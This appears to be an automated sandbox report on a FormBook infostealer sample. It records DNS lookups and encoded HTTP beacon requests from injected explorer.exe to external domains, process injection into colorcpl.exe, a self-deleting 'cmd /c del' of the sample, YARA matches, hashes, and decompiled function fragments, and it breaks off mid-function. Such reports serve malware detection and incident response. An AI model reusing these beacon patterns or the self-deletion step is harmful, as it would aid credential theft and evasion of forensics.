                                                                                                                              Sep 27, 2021 18:05:38.476347923 CEST8.8.8.8192.168.2.40x6940No error (0)www.marmorariapiramide.onlinemarmorariapiramide.onlineCNAME (Canonical name)IN (0x0001)
                                                                                                                              Sep 27, 2021 18:05:38.476347923 CEST8.8.8.8192.168.2.40x6940No error (0)marmorariapiramide.online143.198.15.243A (IP address)IN (0x0001)
                                                                                                                              Sep 27, 2021 18:05:38.476347923 CEST8.8.8.8192.168.2.40x6940No error (0)marmorariapiramide.online2.57.90.16A (IP address)IN (0x0001)

                                                                                                                              HTTP Request Dependency Graph

                                                                                                                              • www.vetpipes.com
                                                                                                                              • www.omniriot.com
                                                                                                                              • www.rangerbuddys.com

                                                                                                                              HTTP Packets

                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                              0192.168.2.449804104.143.9.21180C:\Windows\explorer.exe
                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                              Sep 27, 2021 18:05:11.636744022 CEST7941OUTGET /scb0/?IN9dgxBh=gxg+zqdn+o0ww4uf8TcZaQyTsJgiXCW12nXRXcs11V7/zKzoeUyv6HeZPjVpo2wMT0Al&sVSH=CPDL8v1 HTTP/1.1
                                                                                                                              Host: www.vetpipes.com
                                                                                                                              Connection: close
                                                                                                                              Data Raw: 00 00 00 00 00 00 00
                                                                                                                              Data Ascii:
                                                                                                                              Sep 27, 2021 18:05:11.757265091 CEST7943INHTTP/1.1 200 OK
                                                                                                                              Server: nginx
                                                                                                                              Date: Mon, 27 Sep 2021 16:05:11 GMT
                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                              Transfer-Encoding: chunked
                                                                                                                              Connection: close
                                                                                                                              Vary: Accept-Encoding
                                                                                                                              X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAMLl0RJYcDS0N2xIgi01rOAcEtvCUTUq+IuNz5PA8eXYsfPLRkgnNehO+NbOZAlLoQnSpB5rXuRxRCTF+T1iU9sCAwEAAQ==_FzrU0O/DzPHwhUHqvo1zsrZd6OYhY/CKmMbfkIpM4HkqpULVsnDaZNpBRyCVeu0ugpO2Xos2NXdjGtQoX27wGQ==
                                                                                                                              Data Raw: 33 31 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 6c 6f 6f 73 65 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4d 4c 6c 30 52 4a 59 63 44 53 30 4e 32 78 49 67 69 30 31 72 4f 41 63 45 74 76 43 55 54 55 71 2b 49 75 4e 7a 35 50 41 38 65 58 59 73 66 50 4c 52 6b 67 6e 4e 65 68 4f 2b 4e 62 4f 5a 41 6c 4c 6f 51 6e 53 70 42 35 72 58 75 52 78 52 43 54 46 2b 54 31 69 55 39 73 43 41 77 45 41 41 51 3d 3d 5f 46 7a 72 55 30 4f 2f 44 7a 50 48 77 68 55 48 71 76 6f 31 7a 73 72 5a 64 36 4f 59 68 59 2f 43 4b 6d 4d 62 66 6b 49 70 4d 34 48 6b 71 70 55 4c 56 73 6e 44 61 5a 4e 70 42 52 79 43 56 65 75 30 75 67 70 4f 32 58 6f 73 32 4e 58 64 6a 47 74 51 6f 58 32 37 77 47 51 3d 3d 22 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 76 65 74 70 69 70 65 73 2e 63 6f 6d 20 61 74 20 44 69 72 65 63 74 6e 69 63 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 3e 0a 68 74 6d 6c 2c 20 62 6f 64 79 2c 20 69 66 72 61 6d 65 20 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 3b 62 6f 72 64 65 72 3a 30 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 69 6e 68 65 72 69 74 3b 66 6f 6e 74 2d 73 74 79 6c 65 3a 69 6e 68 65 72 69 74 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 30 30 25 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 69 6e 68 65 72 69 74 3b 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 62 61 73 65 6c 69 6e 65 3b 7d 0a 68 74 6d 6c 2c 20 64 69 76 20 7b 68 65 69 67 68 74 3a 31 30 30 25 3b 7d 0a 62 6f 64 79 7b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 35 3b 68 65 69 67 68 74 3a 31 30 30 25 3b 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 69 64 3d 22 70 61 72 74 6e 65 72 22 20 3e 3c 2f 64 69 76 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 6c 61 6e 67 75 61 67 65 3d 22 4a 61 76 61 53 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 30 35 30 30 30 35 2e 76 6f 6f 64 6f 6f 2e 63 6f 6d 2f 6a 73 2f 70 61 72 74 6e 65 72 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 0d 0a 30 0d 0a 0d 0a
                                                                                                                              Data Ascii: 310<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAMLl0RJYcDS0N2xIgi01rOAcEtvCUTUq+IuNz5PA8eXYsfPLRkgnNehO+NbOZAlLoQnSpB5rXuRxRCTF+T1iU9sCAwEAAQ==_FzrU0O/DzPHwhUHqvo1zsrZd6OYhY/CKmMbfkIpM4HkqpULVsnDaZNpBRyCVeu0ugpO2Xos2NXdjGtQoX27wGQ=="><head><title>vetpipes.com at Directnic</title><style>html, body, iframe {margin:0;padding:0;border:0;font-weight:inherit;font-style:inherit;font-size:100%;font-family:inherit;vertical-align:baseline;}html, div {height:100%;}body{line-height:1.5;height:100%;}</style></head><body><div id="partner" ></div><script type="text/javascript" language="JavaScript" src="http://050005.voodoo.com/js/partner.js"></script></body></html>0


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                              1192.168.2.449806154.208.82.16380C:\Windows\explorer.exe
                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                              Sep 27, 2021 18:05:17.177975893 CEST7948OUTGET /scb0/?sVSH=CPDL8v1&IN9dgxBh=beKAYpkJja+K0I/DndBFcQmb1njbIlQSoH3Y/zfbdScl712FMHF3+aANQrs36cfLB01F HTTP/1.1
                                                                                                                              Host: www.omniriot.com
                                                                                                                              Connection: close
                                                                                                                              Data Raw: 00 00 00 00 00 00 00
                                                                                                                              Data Ascii:


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                              2192.168.2.449807103.11.189.18980C:\Windows\explorer.exe
                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                              Sep 27, 2021 18:05:28.029920101 CEST7950OUTGET /scb0/?sVSH=CPDL8v1&IN9dgxBh=J7r5qQFPY3cJvABn1Gs7ze2qtK7SOzbffr49jA2eoV1JiGZLpH7+KoOsOPA+gXWondlu HTTP/1.1
                                                                                                                              Host: www.rangerbuddys.com
                                                                                                                              Connection: close
                                                                                                                              Data Raw: 00 00 00 00 00 00 00
                                                                                                                              Data Ascii:
                                                                                                                              Sep 27, 2021 18:05:28.208403111 CEST7950INHTTP/1.1 200 OK
                                                                                                                              Date: Mon, 27 Sep 2021 16:05:28 GMT
                                                                                                                              Server: Apache
                                                                                                                              X-Powered-By: PHP/5.6.40
                                                                                                                              Connection: close
                                                                                                                              Transfer-Encoding: chunked
                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                              Data Raw: 32 39 61 0d 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 74 61 62 6c 65 20 77 69 64 74 68 3d 22 31 30 30 25 22 20 68 65 69 67 68 74 3d 22 31 30 30 25 22 3e 0a 09 3c 74 72 20 61 6c 69 67 6e 3d 22 63 65 6e 74 65 72 22 3e 0a 09 09 3c 74 64 20 69 64 3d 22 6e 65 77 2d 62 6f 78 22 3e 3c 68 33 3e 2a 2e 63 6f 6d 20 69 73 20 61 20 72 65 67 69 73 74 65 72 65 64 20 64 6f 6d 61 69 6e 2e 3c 62 72 3e 0a 09 09 54 68 69 73 20 69 73 20 61 20 70 6c 61 63 65 68 6f 6c 64 65 72 20 66 6f 72 20 74 68 65 20 77 65 62 73 69 74 65 2e 3c 2f 74 64 3e 0a 09 3c 2f 74 72 3e 0a 09 3c 74 72 20 61 6c 69 67 6e 3d 22 63 65 6e 74 65 72 22 3e 0a 09 09 3c 74 64 3e 49 66 20 79 6f 75 20 77 6f 75 6c 64 20 6c 69 6b 65 20 74 6f 20 3c 73 74 72 6f 6e 67 3e 68 6f 73 74 20 61 20 77 65 62 73 69 74 65 3c 2f 73 74 72 6f 6e 67 3e 20 2f 20 3c 73 74 72 6f 6e 67 3e 6f 62 74 61 69 6e 20 61 20 70 65 72 73 6f 6e 61 6c 69 73 65 64 20 65 6d 61 69 6c 20 61 64 64 72 65 73 73 3c 2f 73 74 72 6f 6e 67 3e 20 2f 20 3c 73 74 72 6f 6e 67 3e 6c 69 6e 6b 20 75 70 20 74 6f 20 47 6f 6f 67 6c 65 20 61 70 70 73 3c 2f 73 74 72 6f 6e 67 3e 2e 20 44 6f 20 67 65 74 20 69 6e 20 74 6f 75 63 68 20 77 69 74 68 20 75 73 2e 3c 62 72 3e 0a 09 09 20 56 6f 64 69 65 6e 20 6f 66 66 65 72 73 20 53 69 6e 67 61 70 6f 72 65 20 68 6f 73 74 65 64 20 73 65 72 76 65 72 73 20 66 6f 72 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 76 6f 64 69 65 6e 2e 63 6f 6d 2f 22 3e 53 69 6e 67 61 70 6f 72 65 20 57 65 62 20 48 6f 73 74 69 6e 67 3c 2f 61 3e 20 61 6e 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 76 6f 64 69 65 6e 2e 63 6f 6d 2f 73 69 6e 67 61 70 6f 72 65 2d 65 6d 61 69 6c 2d 68 6f 73 74 69 6e 67 2e 70 68 70 22 3e 53 69 6e 67 61 70 6f 72 65 20 45 6d 61 69 6c 20 48 6f 73 74 69 6e 67 3c 2f 61 3e 20 73 65 72 76 69 63 65 73 2e 3c 2f 74 64 3e 0a 09 3c 2f 74 72 3e 0a 3c 2f 74 61 62 6c 65 3e 0a 0a 0d 0a
                                                                                                                              Data Ascii: 29a<head><meta name="robots" content="noindex, nofollow"></head><table width="100%" height="100%"><tr align="center"><td id="new-box"><h3>*.com is a registered domain.<br>This is a placeholder for the website.</td></tr><tr align="center"><td>If you would like to <strong>host a website</strong> / <strong>obtain a personalised email address</strong> / <strong>link up to Google apps</strong>. Do get in touch with us.<br> Vodien offers Singapore hosted servers for <a href="http://www.vodien.com/">Singapore Web Hosting</a> and <a href="http://www.vodien.com/singapore-email-hosting.php">Singapore Email Hosting</a> services.</td></tr></table>
                                                                                                                              Sep 27, 2021 18:05:28.208427906 CEST7951INData Raw: 30 0d 0a 0d 0a
                                                                                                                              Data Ascii: 0


                                                                                                                              Code Manipulations

                                                                                                                              Statistics

                                                                                                                              CPU Usage

                                                                                                                              Click to jump to process

                                                                                                                              Memory Usage

                                                                                                                              Click to jump to process

                                                                                                                              High Level Behavior Distribution

                                                                                                                              Click to dive into process behavior distribution

                                                                                                                              Behavior

                                                                                                                              Click to jump to process

                                                                                                                              System Behavior

                                                                                                                              Analysis Process: 3cGH9Bakuq.exe PID: 6452 Parent PID: 6556

                                                                                                                              General

                                                                                                                              Start time:18:03:39
                                                                                                                              Start date:27/09/2021
                                                                                                                              Path:C:\Users\user\Desktop\3cGH9Bakuq.exe
                                                                                                                              Wow64 process (32bit):true
                                                                                                                              Commandline:'C:\Users\user\Desktop\3cGH9Bakuq.exe'
                                                                                                                              Imagebase:0x240000
                                                                                                                              File size:626688 bytes
                                                                                                                              MD5 hash:0ECA879131A7B104418B085DB7F761C3
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:.Net C# or VB.NET
                                                                                                                              Yara matches:
                                                                                                                              • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.686725719.00000000025B1000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.687646701.00000000035B9000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.687646701.00000000035B9000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.687646701.00000000035B9000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                              • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.686799799.0000000002604000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                              Reputation:low

                                                                                                                              Chronological Activities

                                                                                                                              Analysis Process: 3cGH9Bakuq.exe PID: 6668 Parent PID: 6452

                                                                                                                              General

                                                                                                                              Start time:18:03:49
                                                                                                                              Start date:27/09/2021
                                                                                                                              Path:C:\Users\user\Desktop\3cGH9Bakuq.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:C:\Users\user\Desktop\3cGH9Bakuq.exe
                                                                                                                              Imagebase:0xa0000
                                                                                                                              File size:626688 bytes
                                                                                                                              MD5 hash:0ECA879131A7B104418B085DB7F761C3
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Reputation:low

                                                                                                                              Chronological Activities

                                                                                                                              Analysis Process: 3cGH9Bakuq.exe PID: 6420 Parent PID: 6452

                                                                                                                              General

                                                                                                                              Start time:18:03:50
                                                                                                                              Start date:27/09/2021
                                                                                                                              Path:C:\Users\user\Desktop\3cGH9Bakuq.exe
                                                                                                                              Wow64 process (32bit):true
                                                                                                                              Commandline:C:\Users\user\Desktop\3cGH9Bakuq.exe
                                                                                                                              Imagebase:0x440000
                                                                                                                              File size:626688 bytes
                                                                                                                              MD5 hash:0ECA879131A7B104418B085DB7F761C3
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Yara matches:
                                                                                                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.779648624.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.779648624.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.779648624.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.780291616.0000000000BA0000.00000040.00020000.sdmp, Author: Joe Security
                                                                                                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.780291616.0000000000BA0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.780291616.0000000000BA0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.780216392.0000000000A10000.00000040.00020000.sdmp, Author: Joe Security
                                                                                                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.780216392.0000000000A10000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.780216392.0000000000A10000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                              Reputation:low

                                                                                                                              Chronological Activities

                                                                                                                              Analysis Process: explorer.exe PID: 3424 Parent PID: 6420

                                                                                                                              General

                                                                                                                              Start time:18:03:52
                                                                                                                              Start date:27/09/2021
                                                                                                                              Path:C:\Windows\explorer.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:C:\Windows\Explorer.EXE
                                                                                                                              Imagebase:0x7ff6fee60000
                                                                                                                              File size:3933184 bytes
                                                                                                                              MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Yara matches:
                                                                                                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000000.716031426.000000000DA49000.00000040.00020000.sdmp, Author: Joe Security
                                                                                                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000000.716031426.000000000DA49000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000000.716031426.000000000DA49000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000000.738903713.000000000DA49000.00000040.00020000.sdmp, Author: Joe Security
                                                                                                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000000.738903713.000000000DA49000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000000.738903713.000000000DA49000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                              Reputation:high

                                                                                                                              Chronological Activities

                                                                                                                              Analysis Process: autofmt.exe PID: 5908 Parent PID: 3424

                                                                                                                              General

                                                                                                                              Start time:18:04:29
                                                                                                                              Start date:27/09/2021
                                                                                                                              Path:C:\Windows\SysWOW64\autofmt.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:C:\Windows\SysWOW64\autofmt.exe
                                                                                                                              Imagebase:0x10f0000
                                                                                                                              File size:831488 bytes
                                                                                                                              MD5 hash:7FC345F685C2A58283872D851316ACC4
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Reputation:moderate

                                                                                                                              Chronological Activities

                                                                                                                              Analysis Process: colorcpl.exe PID: 6676 Parent PID: 3424

                                                                                                                              General

                                                                                                                              Start time:18:04:30
                                                                                                                              Start date:27/09/2021
                                                                                                                              Path:C:\Windows\SysWOW64\colorcpl.exe
                                                                                                                              Wow64 process (32bit):true
                                                                                                                              Commandline:C:\Windows\SysWOW64\colorcpl.exe
                                                                                                                              Imagebase:0xdc0000
                                                                                                                              File size:86528 bytes
                                                                                                                              MD5 hash:746F3B5E7652EA0766BA10414D317981
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Yara matches:
                                                                                                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000F.00000002.929569610.0000000004CB0000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000F.00000002.929569610.0000000004CB0000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000F.00000002.929569610.0000000004CB0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000F.00000002.928514787.0000000000CD0000.00000040.00020000.sdmp, Author: Joe Security
                                                                                                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000F.00000002.928514787.0000000000CD0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000F.00000002.928514787.0000000000CD0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000F.00000002.929541418.0000000004C80000.00000040.00020000.sdmp, Author: Joe Security
                                                                                                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000F.00000002.929541418.0000000004C80000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000F.00000002.929541418.0000000004C80000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                              Reputation:moderate

                                                                                                                              Chronological Activities

                                                                                                                              Analysis Process: cmd.exe PID: 1472 Parent PID: 6676

                                                                                                                              General

                                                                                                                              Start time:18:04:36
                                                                                                                              Start date:27/09/2021
                                                                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                              Wow64 process (32bit):true
                                                                                                                              Commandline:/c del 'C:\Users\user\Desktop\3cGH9Bakuq.exe'
                                                                                                                              Imagebase:0x11d0000
                                                                                                                              File size:232960 bytes
                                                                                                                              MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Reputation:high

                                                                                                                              Chronological Activities

                                                                                                                              Analysis Process: conhost.exe PID: 6028 Parent PID: 1472

                                                                                                                              General

                                                                                                                              Start time:18:04:36
                                                                                                                              Start date:27/09/2021
                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                              Imagebase:0x7ff724c50000
                                                                                                                              File size:625664 bytes
                                                                                                                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Reputation:high

                                                                                                                              Chronological Activities

                                                                                                                              Disassembly

                                                                                                                              Code Analysis

                                                                                                                              Reset < >

                                                                                                                                Analysis Process: 3cGH9Bakuq.exe PID: 6452 Parent PID: 6556 3cGH9Bakuq.exeCOMMON

                                                                                                                                Executed Functions

                                                                                                                                Function 04B628F0, Relevance: 1.6, APIs: 1, Instructions: 93COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • CallWindowProcW.USER32(?,?,?,?,?), ref: 04B629B1
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.689027595.0000000004B60000.00000040.00000001.sdmp, Offset: 04B60000, based on PE: false
                                                                                                                                Similarity
                                                                                                                                • API ID: CallProcWindow
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2714655100-0
                                                                                                                                • Opcode ID: e635706c7c0d66c907c1dc4f3b0cc6976d3129cb6c60ea3aa2de7b69c9b3e957
                                                                                                                                • Instruction ID: f2e75f3e21af8064018e06507f3a73500c7d7afb03a61942eaf0dba483a7491f
                                                                                                                                • Opcode Fuzzy Hash: e635706c7c0d66c907c1dc4f3b0cc6976d3129cb6c60ea3aa2de7b69c9b3e957
                                                                                                                                • Instruction Fuzzy Hash: B54159B5A00309CFDB14DF99C488AAABBF5FF88314F25C499D419AB361D734A845CFA1
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Non-executed Functions

                                                                                                                                Analysis Process: 3cGH9Bakuq.exe PID: 6668 Parent PID: 6452 3cGH9Bakuq.exeCOMMON

                                                                                                                                Executed Functions

                                                                                                                                Non-executed Functions

                                                                                                                                Function 000A695C, Relevance: 2.7, Instructions: 2700COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000005.00000002.683654061.00000000000A2000.00000002.00020000.sdmp, Offset: 000A0000, based on PE: true
                                                                                                                                • Associated: 00000005.00000002.683645256.00000000000A0000.00000002.00020000.sdmp Download File
                                                                                                                                • Associated: 00000005.00000002.683756163.000000000013C000.00000002.00020000.sdmp Download File
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: b4d36b069f4d91afe3f5f47c5c8ce2a60c7c445c687975eadacb23cc74e7931c
                                                                                                                                • Instruction ID: a64d4dfdafcd58a58b2f71c79ba4a9e49ed00d06485c9f18ea9b931a8eb782b9
                                                                                                                                • Opcode Fuzzy Hash: b4d36b069f4d91afe3f5f47c5c8ce2a60c7c445c687975eadacb23cc74e7931c
                                                                                                                                • Instruction Fuzzy Hash: 0923146144E7C25FCB234BB85CB56E5BFB1AE6322471E48DBC4C08F0A3E219195BD762
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Analysis Process: 3cGH9Bakuq.exe PID: 6420 Parent PID: 6452 3cGH9Bakuq.exeCOMMON

                                                                                                                                Executed Functions

                                                                                                                                Function 0041865A, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 56filenativeCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                C-Code - Quality: 100%
                                                                                                                                			E0041865A(void* __edi) {

				if (( *(__edi + 0x64) & __edi + 0x00000001) >= 0) goto L3;
			}



                                                                                                                                0x0041865f

                                                                                                                                APIs
                                                                                                                                • NtReadFile.NTDLL(b=A,5E972F65,FFFFFFFF,?,?,?,b=A,?,!:A,FFFFFFFF,5E972F65,00413D62,?,00000000), ref: 004186A5
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000006.00000002.779648624.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID: FileRead
                                                                                                                                • String ID: !:A$b=A$b=A
                                                                                                                                • API String ID: 2738559852-704622139
                                                                                                                                • Opcode ID: e6fd45c1d3e1de46b678a42ff336ce6b9bd7810bc6c8f563d84b131f7668c147
                                                                                                                                • Instruction ID: 1732a0ad6228155adb96694fea6a6f61ac98a1996e08fbe828622aced6636826
                                                                                                                                • Opcode Fuzzy Hash: e6fd45c1d3e1de46b678a42ff336ce6b9bd7810bc6c8f563d84b131f7668c147
                                                                                                                                • Instruction Fuzzy Hash: C50157B2200204BBDB14DF88CC85EEB77A9EF8C314F058649FA0DA7241CA30E951CBE4
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 00418660, Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 36filenativeCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • NtReadFile.NTDLL(b=A,5E972F65,FFFFFFFF,?,?,?,b=A,?,!:A,FFFFFFFF,5E972F65,00413D62,?,00000000), ref: 004186A5
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000006.00000002.779648624.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID: FileRead
                                                                                                                                • String ID: !:A$b=A$b=A
                                                                                                                                • API String ID: 2738559852-704622139
                                                                                                                                • Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                                                                                                                • Instruction ID: 1e9a607f8d7ae55c6529455560845d335dd5ab867efd933cdf95456f7e89143a
                                                                                                                                • Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                                                                                                                • Instruction Fuzzy Hash: 7CF0A4B2200208ABDB14DF89DC95EEB77ADAF8C754F158249BA1D97241DA30E851CBA4
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 004185AA, Relevance: 1.6, APIs: 1, Instructions: 56filenativeCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                C-Code - Quality: 21%
                                                                                                                                			E004185AA(void* __eflags) {
				void* __esi;
				void* __ebp;
				intOrPtr* _t20;
				intOrPtr* _t28;
				void* _t30;

